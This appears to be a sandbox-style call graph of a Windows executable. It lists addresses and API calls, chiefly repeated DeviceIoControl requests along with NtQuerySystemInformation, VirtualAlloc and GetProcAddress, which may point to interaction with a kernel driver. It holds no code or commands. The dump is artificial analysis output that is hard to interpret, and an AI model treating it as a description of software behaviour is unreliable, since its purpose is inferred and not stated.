7ff7cc4178b4 5855->5857 6284 7ff7cc41c360 5856->6284 5859 7ff7cc41a3c0 9 API calls 5857->5859 5862 7ff7cc4178c7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5859->5862 5862->5835 5863 7ff7cc4178f4 5863->5835 5865 7ff7cc4178fe 5863->5865 5867 7ff7cc417910 DeviceIoControl 5865->5867 5870 7ff7cc417987 5865->5870 5867->5865 5867->5870 5872 7ff7cc417a13 5870->5872 5874 7ff7cc4179a0 DeviceIoControl 5870->5874 6300 7ff7cc416fc0 5872->6300 5874->5870 5874->5872 5879 7ff7cc417a1b 5880 7ff7cc41a3c0 9 API calls 5879->5880 5881 7ff7cc417a2e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5880->5881 5881->5847 5883 7ff7cc41c9f0 7 API calls 5882->5883 5884 7ff7cc417ef9 5883->5884 5885 7ff7cc4232c0 25 API calls 5884->5885 5886 7ff7cc417f03 5885->5886 5887 7ff7cc417f44 5886->5887 5888 7ff7cc417f3f 5886->5888 5889 7ff7cc417f38 _invalid_parameter_noinfo_noreturn 5886->5889 5891 7ff7cc417c70 21 API calls 5887->5891 5909 7ff7cc417f49 5887->5909 5890 7ff7cc423fe0 free 5888->5890 5889->5888 5890->5887 5892 7ff7cc417f6c 5891->5892 5893 7ff7cc417b00 22 API calls 5892->5893 5895 7ff7cc417f8b 5893->5895 5894 7ff7cc41a3c0 9 API calls 5896 7ff7cc418966 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5894->5896 5897 7ff7cc417b00 22 API calls 5895->5897 5895->5909 5924 7ff7cc418183 5896->5924 5898 7ff7cc417fc1 5897->5898 5901 7ff7cc416d90 9 API calls 5898->5901 5898->5909 5899 7ff7cc423fc0 8 API calls 5900 7ff7cc414e09 5899->5900 5900->5293 5987 7ff7cc416810 NtQuerySystemInformation 5900->5987 5902 7ff7cc417fe7 5901->5902 5903 7ff7cc416d90 9 API calls 5902->5903 5904 7ff7cc418001 5903->5904 5905 7ff7cc41a3c0 9 API calls 5904->5905 5904->5909 5906 7ff7cc41802e ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5905->5906 
5907 7ff7cc416e90 50 API calls 5906->5907 5908 7ff7cc418062 5907->5908 5908->5909 5910 7ff7cc41a3c0 9 API calls 5908->5910 5909->5894 5909->5924 5911 7ff7cc418085 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5910->5911 5912 7ff7cc4180b0 DeviceIoControl 5911->5912 5913 7ff7cc418119 5912->5913 5914 7ff7cc41891b 5912->5914 5913->5912 5915 7ff7cc418128 5913->5915 5916 7ff7cc41a3c0 9 API calls 5914->5916 5917 7ff7cc418131 5915->5917 5963 7ff7cc41818a 5915->5963 5918 7ff7cc41892e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5916->5918 5919 7ff7cc41a3c0 9 API calls 5917->5919 5920 7ff7cc416fc0 50 API calls 5918->5920 5921 7ff7cc418144 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5919->5921 5920->5909 5922 7ff7cc416fc0 50 API calls 5921->5922 5923 7ff7cc41815c 5922->5923 5923->5924 5926 7ff7cc41a3c0 9 API calls 5923->5926 5924->5899 5925 7ff7cc4181e2 DeviceIoControl 5927 7ff7cc418827 5925->5927 5925->5963 5928 7ff7cc418173 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5926->5928 5929 7ff7cc41a3c0 9 API calls 5927->5929 5928->5924 5930 7ff7cc41884c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5929->5930 5932 7ff7cc41855f 5930->5932 5931 7ff7cc418290 DeviceIoControl 5931->5927 5931->5963 5933 7ff7cc416fc0 50 API calls 5932->5933 5935 7ff7cc418866 5933->5935 5934 7ff7cc4184e0 DeviceIoControl 5934->5927 5934->5963 5936 7ff7cc41a3c0 9 API calls 5935->5936 5941 7ff7cc418825 5935->5941 5937 7ff7cc41887d ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5936->5937 5937->5941 5938 7ff7cc4188d2 5938->5924 5945 7ff7cc418911 5938->5945 5946 7ff7cc41890a _invalid_parameter_noinfo_noreturn 5938->5946 5939 7ff7cc418339 memset 5942 7ff7cc415e00 9 API calls 5939->5942 5940 7ff7cc4188cd 5944 7ff7cc423fe0 free 5940->5944 5941->5938 5941->5940 5943 7ff7cc4188c6 _invalid_parameter_noinfo_noreturn 
5941->5943 5942->5963 5943->5940 5944->5938 5947 7ff7cc423fe0 free 5945->5947 5946->5945 5947->5924 5948 7ff7cc41c8b0 7 API calls 5948->5963 5949 7ff7cc41a3c0 9 API calls 5950 7ff7cc4187da ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5949->5950 5951 7ff7cc4187ef 5950->5951 5952 7ff7cc416fc0 50 API calls 5951->5952 5953 7ff7cc4187f4 5952->5953 5955 7ff7cc4187b1 5953->5955 5956 7ff7cc41a3c0 9 API calls 5953->5956 5954 7ff7cc41856b 5957 7ff7cc41a3c0 9 API calls 5954->5957 5961 7ff7cc423fe0 free 5955->5961 5960 7ff7cc41880b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5956->5960 5962 7ff7cc41857e 5957->5962 5958 7ff7cc418564 _invalid_parameter_noinfo_noreturn 5958->5954 5959 7ff7cc423fe0 free 5959->5963 5960->5955 5961->5941 5964 7ff7cc41c8b0 7 API calls 5962->5964 5963->5925 5963->5927 5963->5931 5963->5932 5963->5934 5963->5939 5963->5948 5963->5954 5963->5958 5963->5959 5980 7ff7cc418753 5963->5980 5965 7ff7cc4185b6 5964->5965 5966 7ff7cc41d590 9 API calls 5965->5966 5967 7ff7cc4185d1 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5966->5967 5968 7ff7cc4185ec 5967->5968 5969 7ff7cc418625 5967->5969 5971 7ff7cc418620 5968->5971 5973 7ff7cc418619 _invalid_parameter_noinfo_noreturn 5968->5973 5970 7ff7cc418640 DeviceIoControl 5969->5970 5974 7ff7cc4186b8 5969->5974 5970->5969 5970->5980 5972 7ff7cc423fe0 free 5971->5972 5972->5969 5973->5971 5975 7ff7cc4186d0 DeviceIoControl 5974->5975 5976 7ff7cc418740 5974->5976 5975->5974 5975->5980 6400 7ff7cc416320 5976->6400 5978 7ff7cc418748 5979 7ff7cc41875c 5978->5979 5978->5980 5981 7ff7cc41a3c0 9 API calls 5979->5981 5980->5949 5982 7ff7cc418768 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5981->5982 5983 7ff7cc416fc0 50 API calls 5982->5983 5984 7ff7cc418785 5983->5984 5984->5955 5985 7ff7cc41a3c0 9 API calls 5984->5985 5986 7ff7cc41879c 
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5985->5986 5986->5951 5988 7ff7cc41686b 5987->5988 5993 7ff7cc4168b6 5987->5993 5989 7ff7cc416870 VirtualFree VirtualAlloc NtQuerySystemInformation 5988->5989 5989->5989 5989->5993 5990 7ff7cc416927 5991 7ff7cc416d48 VirtualFree 5990->5991 6023 7ff7cc416cfe 5990->6023 5991->6023 5992 7ff7cc416931 VirtualFree 5995 7ff7cc41694b 5992->5995 5992->6023 5993->5990 5993->5992 5994 7ff7cc4168e0 GetCurrentProcessId 5993->5994 5999 7ff7cc41692c 5993->5999 5993->6023 5994->5993 5997 7ff7cc416960 DeviceIoControl 5995->5997 6004 7ff7cc4169d8 5995->6004 5996 7ff7cc423fc0 8 API calls 5998 7ff7cc414e22 5996->5998 5997->5995 6000 7ff7cc416d03 5997->6000 5998->5293 5998->5320 5999->5992 6001 7ff7cc41a3c0 9 API calls 6000->6001 6003 7ff7cc416d16 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6001->6003 6002 7ff7cc416a00 DeviceIoControl 6002->6000 6002->6004 6003->6023 6004->6000 6004->6002 6006 7ff7cc416a78 6004->6006 6005 7ff7cc416aa0 DeviceIoControl 6005->6000 6005->6006 6006->6000 6006->6005 6008 7ff7cc416b18 6006->6008 6007 7ff7cc416b40 DeviceIoControl 6007->6000 6007->6008 6008->6000 6008->6007 6009 7ff7cc416bb8 6008->6009 6009->6000 6010 7ff7cc416bc5 6009->6010 6011 7ff7cc416bed memset 6010->6011 6012 7ff7cc415e00 9 API calls 6011->6012 6015 7ff7cc416c10 6012->6015 6013 7ff7cc416c14 6016 7ff7cc41a3c0 9 API calls 6013->6016 6014 7ff7cc416c30 DeviceIoControl 6014->6013 6014->6015 6015->6013 6015->6014 6017 7ff7cc416c9c 6015->6017 6018 7ff7cc416ce4 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6016->6018 6019 7ff7cc41a3c0 9 API calls 6017->6019 6020 7ff7cc416cf6 6018->6020 6022 7ff7cc416caf 6019->6022 6021 7ff7cc423fe0 free 6020->6021 6021->6023 6024 7ff7cc41a3c0 9 API calls 6022->6024 6023->5996 6025 7ff7cc416cbd ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6024->6025 6025->6020 6027 7ff7cc41c9f0 7 API 
calls 6026->6027 6028 7ff7cc415073 6027->6028 6029 7ff7cc4232c0 25 API calls 6028->6029 6030 7ff7cc41507d 6029->6030 6031 7ff7cc4150be 6030->6031 6032 7ff7cc4150b9 6030->6032 6035 7ff7cc4150b2 _invalid_parameter_noinfo_noreturn 6030->6035 6033 7ff7cc4150ea 6031->6033 6034 7ff7cc4150c3 6031->6034 6036 7ff7cc423fe0 free 6032->6036 6038 7ff7cc417c70 21 API calls 6033->6038 6037 7ff7cc41a7c0 29 API calls 6034->6037 6035->6032 6036->6031 6039 7ff7cc4150d6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6037->6039 6040 7ff7cc415101 6038->6040 6094 7ff7cc41514b 6039->6094 6041 7ff7cc417b00 22 API calls 6040->6041 6042 7ff7cc415120 6041->6042 6044 7ff7cc415128 6042->6044 6046 7ff7cc417c70 21 API calls 6042->6046 6043 7ff7cc423fc0 8 API calls 6045 7ff7cc414e34 6043->6045 6047 7ff7cc41a7c0 29 API calls 6044->6047 6045->5313 6045->5323 6048 7ff7cc415191 6046->6048 6049 7ff7cc41513b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6047->6049 6050 7ff7cc417b00 22 API calls 6048->6050 6049->6094 6051 7ff7cc4151b0 6050->6051 6051->6044 6052 7ff7cc4151c4 6051->6052 6053 7ff7cc417c70 21 API calls 6052->6053 6054 7ff7cc4151db 6053->6054 6055 7ff7cc417b00 22 API calls 6054->6055 6056 7ff7cc4151fa 6055->6056 6057 7ff7cc41526f 6056->6057 6059 7ff7cc417c70 21 API calls 6056->6059 6058 7ff7cc416d90 9 API calls 6057->6058 6060 7ff7cc415281 6058->6060 6061 7ff7cc415219 6059->6061 6062 7ff7cc416d90 9 API calls 6060->6062 6063 7ff7cc417b00 22 API calls 6061->6063 6064 7ff7cc415297 6062->6064 6065 7ff7cc415238 6063->6065 6066 7ff7cc4152b0 DeviceIoControl 6064->6066 6067 7ff7cc41531f 6064->6067 6068 7ff7cc41a7c0 29 API calls 6065->6068 6066->6064 6066->6067 6069 7ff7cc416d90 9 API calls 6067->6069 6070 7ff7cc41525f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6068->6070 6071 7ff7cc415332 6069->6071 6070->6057 6434 7ff7cc415990 6071->6434 6073 7ff7cc415370 DeviceIoControl 6078 7ff7cc41533e 6073->6078 
6074 7ff7cc415990 9 API calls 6074->6078 6075 7ff7cc41540b memset 6076 7ff7cc415e00 9 API calls 6075->6076 6076->6078 6077 7ff7cc415449 wcsstr 6077->6078 6078->6073 6078->6074 6078->6075 6078->6077 6079 7ff7cc4154ba _invalid_parameter_noinfo_noreturn 6078->6079 6080 7ff7cc423fe0 free 6078->6080 6082 7ff7cc4154c1 6078->6082 6078->6094 6079->6082 6080->6078 6081 7ff7cc4154f0 DeviceIoControl 6081->6082 6082->6081 6083 7ff7cc4155b5 6082->6083 6084 7ff7cc415587 6082->6084 6085 7ff7cc4155e0 DeviceIoControl 6083->6085 6086 7ff7cc41564c 6083->6086 6087 7ff7cc41a7c0 29 API calls 6084->6087 6085->6083 6085->6086 6088 7ff7cc415990 9 API calls 6086->6088 6089 7ff7cc41559a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6087->6089 6090 7ff7cc415654 6088->6090 6091 7ff7cc415978 6089->6091 6093 7ff7cc415990 9 API calls 6090->6093 6092 7ff7cc423fe0 free 6091->6092 6092->6094 6095 7ff7cc415664 6093->6095 6094->6043 6096 7ff7cc415680 DeviceIoControl 6095->6096 6097 7ff7cc4156ed 6095->6097 6096->6095 6096->6097 6098 7ff7cc415700 DeviceIoControl 6097->6098 6099 7ff7cc41576c 6097->6099 6098->6097 6098->6099 6100 7ff7cc415780 DeviceIoControl 6099->6100 6101 7ff7cc4157f4 6099->6101 6100->6099 6100->6101 6102 7ff7cc415810 DeviceIoControl 6101->6102 6103 7ff7cc41587c 6101->6103 6102->6101 6102->6103 6104 7ff7cc415890 DeviceIoControl 6103->6104 6105 7ff7cc415904 6103->6105 6104->6103 6104->6105 6106 7ff7cc41590f 6105->6106 6107 7ff7cc415934 6105->6107 6108 7ff7cc41a7c0 29 API calls 6106->6108 6440 7ff7cc41aa30 6107->6440 6110 7ff7cc415922 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6108->6110 6111 7ff7cc415941 6110->6111 6112 7ff7cc41a7c0 29 API calls 6111->6112 6113 7ff7cc415954 6112->6113 6114 7ff7cc41a3c0 9 API calls 6113->6114 6115 7ff7cc415966 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6114->6115 6115->6091 6118 7ff7cc41cece 6117->6118 6119 7ff7cc41d022 6117->6119 6120 7ff7cc41cf2e 
6118->6120 6123 7ff7cc41cf5a 6118->6123 6124 7ff7cc41cf21 6118->6124 6137 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 6119->6137 6125 7ff7cc424108 std::_Facet_Register 3 API calls 6120->6125 6122 7ff7cc41d027 6127 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 6122->6127 6126 7ff7cc41cf43 6123->6126 6129 7ff7cc424108 std::_Facet_Register 3 API calls 6123->6129 6124->6120 6124->6122 6125->6126 6128 7ff7cc41cfdb _invalid_parameter_noinfo_noreturn 6126->6128 6131 7ff7cc41cf8e memmove memmove 6126->6131 6132 7ff7cc41cfe2 memmove memmove 6126->6132 6130 7ff7cc41d02d 6127->6130 6128->6132 6129->6126 6130->5640 6133 7ff7cc41cfb9 6131->6133 6134 7ff7cc41cfce 6131->6134 6135 7ff7cc41cfd9 6132->6135 6133->6128 6133->6134 6136 7ff7cc423fe0 free 6134->6136 6135->5640 6136->6135 6140 7ff7cc419fde ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH 6139->6140 6141 7ff7cc41a09a 6139->6141 6140->6141 6142 7ff7cc419ffc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ _get_stream_buffer_pointers ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2 6140->6142 6143 7ff7cc423fc0 8 API calls 6141->6143 6148 7ff7cc41c7a0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 6142->6148 6145 7ff7cc418a94 6143->6145 6145->5683 6145->5684 6147 7ff7cc41a0a0 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6147->6141 6149 7ff7cc41c802 6148->6149 6150 7ff7cc41c877 ??1_Lockit@std@@QEAA 6149->6150 6152 7ff7cc41c819 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 6149->6152 6153 7ff7cc41c825 6149->6153 6151 7ff7cc423fc0 8 API calls 6150->6151 6154 7ff7cc41a08a ?always_noconv@codecvt_base@std@ 6151->6154 6152->6153 6153->6150 6155 7ff7cc41c83c ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 6153->6155 6154->6141 6154->6147 6156 7ff7cc41c8a7 6155->6156 6157 7ff7cc41c850 6155->6157 6165 7ff7cc411280 6156->6165 6162 7ff7cc423868 6157->6162 6161 7ff7cc41c8ac 6163 7ff7cc424108 std::_Facet_Register 3 API calls 6162->6163 6164 7ff7cc41c862 6163->6164 6164->6150 
6168 7ff7cc411250 6165->6168 6167 7ff7cc41128e _CxxThrowException __std_exception_copy 6167->6161 6168->6167 6170 7ff7cc419ed3 6169->6170 6171 7ff7cc419e23 6169->6171 6172 7ff7cc423fc0 8 API calls 6170->6172 6171->6170 6173 7ff7cc419e2d 6171->6173 6174 7ff7cc419ee2 6172->6174 6175 7ff7cc419e46 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 6173->6175 6176 7ff7cc419e71 6173->6176 6174->5690 6177 7ff7cc419e6c 6175->6177 6178 7ff7cc423fc0 8 API calls 6176->6178 6177->6176 6180 7ff7cc419ea7 fwrite 6177->6180 6179 7ff7cc419e8e 6178->6179 6179->5690 6180->6176 6182 7ff7cc41d2c7 6181->6182 6183 7ff7cc41d35e memmove memmove 6181->6183 6184 7ff7cc41d3a6 6182->6184 6186 7ff7cc41d349 6182->6186 6187 7ff7cc41d327 6182->6187 6183->5700 6185 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 6184->6185 6190 7ff7cc41d3ab 6185->6190 6189 7ff7cc41d334 6186->6189 6192 7ff7cc424108 std::_Facet_Register 3 API calls 6186->6192 6188 7ff7cc424108 std::_Facet_Register 3 API calls 6187->6188 6191 7ff7cc41d32f 6188->6191 6189->6183 6191->6189 6193 7ff7cc41d342 _invalid_parameter_noinfo_noreturn 6191->6193 6192->6189 6193->6186 6198 7ff7cc41cb52 6197->6198 6199 7ff7cc41cbc7 ??1_Lockit@std@@QEAA 6198->6199 6201 7ff7cc41cb69 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 6198->6201 6202 7ff7cc41cb75 6198->6202 6200 7ff7cc423fc0 8 API calls 6199->6200 6203 7ff7cc41cbe2 6200->6203 6201->6202 6202->6199 6204 7ff7cc41cb8c ?_Getcat@?$ctype@_W@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 6202->6204 6203->5777 6205 7ff7cc41cbf7 6204->6205 6206 7ff7cc41cba0 6204->6206 6207 7ff7cc411280 Concurrency::cancel_current_task 2 API calls 6205->6207 6208 7ff7cc423868 std::_Facet_Register 3 API calls 6206->6208 6209 7ff7cc41cbfc 6207->6209 6210 7ff7cc41cbb2 6208->6210 6210->6199 6212 7ff7cc415eba 6211->6212 6213 7ff7cc415e36 6211->6213 6215 7ff7cc423fc0 8 API calls 6212->6215 6213->6212 6214 7ff7cc415e40 DeviceIoControl 6213->6214 6214->6212 6214->6213 6216 7ff7cc415ec9 
6215->6216 6216->5793 6216->5797 6222 7ff7cc417c80 6217->6222 6218 7ff7cc417ca3 6220 7ff7cc423fc0 8 API calls 6218->6220 6219 7ff7cc417cd0 DeviceIoControl 6221 7ff7cc417e6d 6219->6221 6219->6222 6223 7ff7cc417300 6220->6223 6224 7ff7cc41a3c0 9 API calls 6221->6224 6222->6218 6222->6219 6230 7ff7cc417d58 6222->6230 6223->5801 6225 7ff7cc417e80 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6224->6225 6225->6218 6226 7ff7cc417dd8 6226->6218 6228 7ff7cc41a3c0 9 API calls 6226->6228 6227 7ff7cc417da0 memcmp 6227->6230 6229 7ff7cc417deb ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6228->6229 6229->6218 6230->6226 6230->6227 6230->6230 6232 7ff7cc416dd1 DeviceIoControl 6231->6232 6233 7ff7cc416e4f 6232->6233 6234 7ff7cc416e3f 6232->6234 6235 7ff7cc423fc0 8 API calls 6233->6235 6234->6232 6234->6233 6236 7ff7cc416e6b 6235->6236 6236->5827 6238 7ff7cc416ea2 6237->6238 6239 7ff7cc416f96 6237->6239 6240 7ff7cc416f69 6238->6240 6243 7ff7cc424090 3 API calls 6238->6243 6239->5831 6241 7ff7cc416f9e 6240->6241 6242 7ff7cc416f73 6240->6242 6360 7ff7cc41bf40 6241->6360 6244 7ff7cc41a3c0 9 API calls 6242->6244 6245 7ff7cc416ece 6243->6245 6247 7ff7cc416f86 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6244->6247 6245->6240 6248 7ff7cc41c9f0 7 API calls 6245->6248 6247->6239 6249 7ff7cc416f03 6248->6249 6333 7ff7cc416440 6249->6333 6252 7ff7cc416f5c 6359 7ff7cc424024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6252->6359 6254 7ff7cc416f57 6256 7ff7cc423fe0 free 6254->6256 6255 7ff7cc416f50 _invalid_parameter_noinfo_noreturn 6255->6254 6256->6252 6258 7ff7cc417132 6257->6258 6259 7ff7cc417275 6258->6259 6260 7ff7cc41722f 6258->6260 6265 7ff7cc424090 3 API calls 6258->6265 6261 7ff7cc423fc0 8 API calls 6259->6261 6263 7ff7cc417239 6260->6263 6264 7ff7cc41725e 6260->6264 6262 7ff7cc417296 6261->6262 6262->5838 6266 7ff7cc41a3c0 9 API calls 6263->6266 6383 
7ff7cc41c580 6264->6383 6267 7ff7cc417182 6265->6267 6269 7ff7cc41724c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6266->6269 6267->6260 6270 7ff7cc41c9f0 7 API calls 6267->6270 6269->6259 6271 7ff7cc4171b7 6270->6271 6272 7ff7cc416440 27 API calls 6271->6272 6273 7ff7cc4171c9 6272->6273 6274 7ff7cc417210 6273->6274 6275 7ff7cc41720b 6273->6275 6277 7ff7cc417204 _invalid_parameter_noinfo_noreturn 6273->6277 6382 7ff7cc424024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6274->6382 6278 7ff7cc423fe0 free 6275->6278 6277->6275 6278->6274 6280 7ff7cc4240a6 6279->6280 6281 7ff7cc4240ab ReleaseSRWLockExclusive 6280->6281 6283 7ff7cc4240b0 SleepConditionVariableSRW 6280->6283 6283->6280 6285 7ff7cc41c3de 6284->6285 6286 7ff7cc41c3a4 6284->6286 6288 7ff7cc423fc0 8 API calls 6285->6288 6286->6285 6287 7ff7cc41c3a9 GetModuleHandleA 6286->6287 6289 7ff7cc41c407 GetProcAddress 6287->6289 6290 7ff7cc41c3bb 6287->6290 6291 7ff7cc41c3ec 6288->6291 6289->6290 6292 7ff7cc41c428 6289->6292 6294 7ff7cc41a3c0 9 API calls 6290->6294 6291->5863 6293 7ff7cc41c440 DeviceIoControl 6292->6293 6296 7ff7cc41c4bc 6292->6296 6293->6285 6293->6292 6295 7ff7cc41c3ce ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6294->6295 6295->6285 6297 7ff7cc415ef0 9 API calls 6296->6297 6298 7ff7cc41c4d0 6297->6298 6298->5863 6298->6285 6299 7ff7cc41c528 DeviceIoControl 6298->6299 6299->6285 6299->6298 6301 7ff7cc416fd2 6300->6301 6302 7ff7cc4170c6 6300->6302 6303 7ff7cc417099 6301->6303 6306 7ff7cc424090 3 API calls 6301->6306 6302->5879 6304 7ff7cc4170ce 6303->6304 6305 7ff7cc4170a3 6303->6305 6310 7ff7cc41c18f GetModuleHandleA 6304->6310 6311 7ff7cc41c1c4 6304->6311 6307 7ff7cc41a3c0 9 API calls 6305->6307 6309 7ff7cc416ffe 6306->6309 6308 7ff7cc4170b6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6307->6308 6308->6302 6309->6303 6312 7ff7cc41c9f0 7 API calls 6309->6312 6313 
7ff7cc41c1ee GetProcAddress 6310->6313 6314 7ff7cc41c1a1 6310->6314 6317 7ff7cc423fc0 8 API calls 6311->6317 6316 7ff7cc417033 6312->6316 6313->6314 6315 7ff7cc41c20f 6313->6315 6320 7ff7cc41a3c0 9 API calls 6314->6320 6318 7ff7cc41c230 DeviceIoControl 6315->6318 6324 7ff7cc41c2a8 6315->6324 6319 7ff7cc416440 27 API calls 6316->6319 6321 7ff7cc41c1d2 6317->6321 6318->6311 6318->6315 6322 7ff7cc417045 6319->6322 6323 7ff7cc41c1b4 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6320->6323 6321->5879 6325 7ff7cc41708c 6322->6325 6327 7ff7cc417087 6322->6327 6330 7ff7cc417080 _invalid_parameter_noinfo_noreturn 6322->6330 6323->6311 6326 7ff7cc415ef0 9 API calls 6324->6326 6399 7ff7cc424024 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 6325->6399 6329 7ff7cc41c2be 6326->6329 6331 7ff7cc423fe0 free 6327->6331 6329->6311 6332 7ff7cc41c2e0 DeviceIoControl 6329->6332 6330->6327 6331->6325 6332->6311 6332->6329 6334 7ff7cc41647a memset 6333->6334 6347 7ff7cc416634 6333->6347 6335 7ff7cc4164b0 DeviceIoControl 6334->6335 6337 7ff7cc41651e 6335->6337 6335->6347 6336 7ff7cc423fc0 8 API calls 6338 7ff7cc416757 6336->6338 6337->6335 6340 7ff7cc41652d 6337->6340 6338->6252 6338->6254 6338->6255 6339 7ff7cc416550 DeviceIoControl 6339->6340 6339->6347 6340->6339 6341 7ff7cc4165cc 6340->6341 6340->6347 6342 7ff7cc4165e3 VirtualAlloc 6341->6342 6341->6347 6343 7ff7cc415e00 9 API calls 6342->6343 6344 7ff7cc41661f 6343->6344 6345 7ff7cc416623 VirtualFree 6344->6345 6351 7ff7cc41663b 6344->6351 6345->6347 6346 7ff7cc41672d VirtualFree 6346->6347 6347->6336 6348 7ff7cc41c9f0 7 API calls 6348->6351 6349 7ff7cc4166c3 _stricmp 6350 7ff7cc416769 6349->6350 6349->6351 6352 7ff7cc4167ec VirtualFree 6350->6352 6355 7ff7cc41679f VirtualFree 6350->6355 6357 7ff7cc4167b0 6350->6357 6351->6346 6351->6348 6351->6349 6353 7ff7cc4167e5 _invalid_parameter_noinfo_noreturn 6351->6353 6354 7ff7cc423fe0 free 6351->6354 6352->6357 6353->6352 
6354->6351 6355->6357 6356 7ff7cc4167ff 6358 7ff7cc423fe0 free 6356->6358 6357->6347 6357->6353 6357->6356 6358->6347 6361 7ff7cc41bf80 6360->6361 6375 7ff7cc41bfba 6360->6375 6362 7ff7cc41bf85 GetModuleHandleA 6361->6362 6361->6375 6364 7ff7cc41bf97 6362->6364 6365 7ff7cc41bfe3 GetProcAddress 6362->6365 6363 7ff7cc423fc0 8 API calls 6366 7ff7cc41bfc8 6363->6366 6368 7ff7cc41a3c0 9 API calls 6364->6368 6365->6364 6367 7ff7cc41c004 6365->6367 6366->6239 6369 7ff7cc41c020 DeviceIoControl 6367->6369 6371 7ff7cc41c098 6367->6371 6370 7ff7cc41bfaa ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6368->6370 6369->6367 6369->6375 6370->6375 6376 7ff7cc415ef0 6371->6376 6373 7ff7cc41c0ae 6374 7ff7cc41c0d2 DeviceIoControl 6373->6374 6373->6375 6374->6373 6374->6375 6375->6363 6379 7ff7cc415f26 6376->6379 6380 7ff7cc415fa6 6376->6380 6377 7ff7cc415f30 DeviceIoControl 6377->6379 6377->6380 6378 7ff7cc423fc0 8 API calls 6381 7ff7cc415fb5 6378->6381 6379->6377 6379->6380 6380->6378 6381->6373 6384 7ff7cc41c5fe 6383->6384 6385 7ff7cc41c5c4 6383->6385 6389 7ff7cc423fc0 8 API calls 6384->6389 6385->6384 6386 7ff7cc41c5c9 GetModuleHandleA 6385->6386 6387 7ff7cc41c627 GetProcAddress 6386->6387 6388 7ff7cc41c5db 6386->6388 6387->6388 6391 7ff7cc41c648 6387->6391 6392 7ff7cc41a3c0 9 API calls 6388->6392 6390 7ff7cc41c60c 6389->6390 